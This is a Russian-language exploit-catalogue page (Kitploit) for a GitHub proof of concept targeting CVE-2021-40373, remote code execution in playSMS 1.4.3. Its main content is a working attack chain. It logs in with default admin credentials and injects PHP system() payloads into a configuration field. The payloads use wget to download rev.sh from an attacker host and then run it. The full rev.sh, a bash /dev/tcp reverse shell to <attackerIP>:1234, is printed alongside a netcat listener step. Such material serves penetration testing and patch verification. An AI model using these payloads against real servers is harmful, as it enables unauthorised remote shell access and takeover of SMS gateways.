Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-40373 — CVE-2021-40373 - удалённое выполнение кода | Kitploit
Инструменты/GitHubGitHub/maikroservice/cve-2021-40373
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubmaikroservice/cve-2021-40373

CVE-2021-40373

CVE-2021-40373 - удалённое выполнение кода

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-playsms

В playsms 1.4.3 есть уязвимость, которая позволяет потенциальным злоумышленникам выполнять удалённый код.

как воспроизвести RCE (shell):

https://playsms.org/

  • docker pull playsms/playsms:1.4.3
  • docker run -d -p 80:80 playsms/playsms
  • войдите, используя admin:admin
  • http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • разместите вредоносный bash-файл на машине атакующего
  • скачайте вредоносный файл на машину с помощью wget
  • введите <?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?>
  • сохраните информацию (она исчезнет из поля ввода, но продолжит работать)
  • http://127.0.0.1/index.php?app=main&inc=core_welcome
  • перезагрузите страницу http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • chmod + выполнение shell-скрипта — <?php system("chmod +x rev.sh && ./rev.sh") ?>)
  • сохраните и посетите * http://127.0.0.1/index.php?app=main&inc=core_welcome, чтобы получить выполнение кода
  • запустите локальный netcat-обработчик, чтобы поймать удалённую оболочку

rev.sh

root@kitploit:~
#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"
Скачать инструмент